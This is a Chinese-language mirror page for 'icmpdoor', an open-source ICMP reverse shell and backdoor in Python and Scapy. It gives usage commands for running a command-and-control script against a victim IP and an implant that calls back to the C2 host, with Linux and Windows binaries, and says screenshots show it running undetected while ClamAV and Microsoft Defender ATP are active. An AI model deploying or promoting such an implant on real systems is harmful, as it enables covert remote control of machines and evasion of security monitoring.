项目作者: krabelize

项目描述 :
ICMP Reverse Shell written in Python 3 and with Scapy (backdoor/rev shell)
高级语言: Python
项目地址: git://github.com/krabelize/icmpdoor.git
创建时间: 2020-11-11T22:32:06Z
项目社区:https://github.com/krabelize/icmpdoor

开源协议:BSD 3-Clause "New" or "Revised" License

下载


icmpdoor - ICMP Reverse Shell

icmpdoor is an ICMP rev shell written in Python3 and scapy. Tested on Ubuntu 20.04, Debian 10 (Kali Linux), and Windows 10.

Read this blog post for more information.

Python version usage (both Windows and Linux):

  1. ./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command and Control)
  2. ./icmpdoor.py -i INTERFACE -d CNC-IP (Implant)

Binary Windows version usage version:

  1. ./icmp-cnc.exe -d VICTIM-IP (Command and Control)
  2. ./icmpdoor.exe -d CNC-IP (Implant)

Binary Linux version usage version:

  1. ./icmp-cnc -d VICTIM-IP (Command and Control)
  2. ./icmpdoor -d CNC-IP (Implant)

Parameters details:

  1. -h, --help show this help message and exit
  2. -i INTERFACE, --interface INTERFACE
  3. Listener (virtual) Network Interface (e.g. eth0)
  4. -d DESTINATION_IP, --destination_ip DESTINATION_IP
  5. Destination IP address
  6. exit Exit Command and Control (E2)

Screenshots

Screenshot 1 and 2 shows how icmpdoor works on Ubuntu 20.04, Debian 10 (Kali Linux) and Windows 10. ClamAV is active on Ubuntu 20.04:
screen1
Microsoft Defender Advanced Threat Protection (ATP) is active on the Windows 10 Enterprise machine:
screen2

Beta

stryngs created a beta to combine both scripts into one. This way Classes are created, which are fundamental for enabling encryption.

License

Berkeley Software Distribution (BSD)

Author

Jeroen van Kessel | cryptsus.com - we craft cyber security solutions